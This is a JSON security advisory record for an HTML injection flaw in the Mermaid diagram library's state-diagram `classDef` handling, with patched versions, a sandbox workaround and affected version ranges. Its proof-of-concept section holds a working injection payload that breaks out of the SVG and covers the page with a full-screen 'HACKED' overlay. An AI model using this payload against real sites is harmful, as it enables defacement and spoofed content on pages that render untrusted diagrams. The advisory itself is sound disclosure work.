{"id":"GHSA-ghcm-xqfw-q4vr","summary":"Mermaid: Improper sanitization of `classDef` in state diagrams leads to HTML injection","details":"### Impact\n\nUnder the default configuration, `classDef` in Mermaid state diagrams allows DOM injection that escapes the SVG, although `\u003cscript\u003e` tags are removed, preventing XSS.\n\n#### Proof-of-concept\n\n```\nstateDiagram-v2\n  classDef xss fill:red\u003c/style\u003e\u003c/svg\u003e\u003cstyle\u003e*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}\u003c/style\u003e\u003cdiv style=\"x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black\"\u003eHACKED\u003c/div\u003e\u003csvg\u003e\u003cstyle\u003ea:b\n  [*] --\u003e A:::xss\n```\n\n### Patches\n\n- [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056))\n- [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3))\n\n### Workarounds\n\nIf you cannot update to a patched version, setting [`\"securityLevel\": \"sandbox\"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this by rendering the Mermaid diagram in a sandboxed `\u003ciframe\u003e`.\n\n### Credits\n\nThanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.","aliases":["CVE-2026-41149"],"modified":"2026-05-11T19:49:03.497911Z","published":"2026-05-11T19:36:46Z","database_specific":{"cwe_ids":["CWE-94"],"github_reviewed_at":"2026-05-11T19:36:46Z","nvd_published_at":null,"severity":"MODERATE","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3"},{"type":"PACKAGE","url":"https://github.com/mermaid-js/mermaid"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0"},{"type":"WEB","url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6"},{"type":"WEB","url":"https://mermaid.js.org/config/schema-docs/config.html#securitylevel"}],"affected":[{"package":{"name":"mermaid","ecosystem":"npm","purl":"pkg:npm/mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"11.0.0-alpha.1"},{"fixed":"11.15.0"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 11.14.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ghcm-xqfw-q4vr/GHSA-ghcm-xqfw-q4vr.json"}},{"package":{"name":"mermaid","ecosystem":"npm","purl":"pkg:npm/mermaid"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"10.9.6"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 10.9.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-ghcm-xqfw-q4vr/GHSA-ghcm-xqfw-q4vr.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L"}]}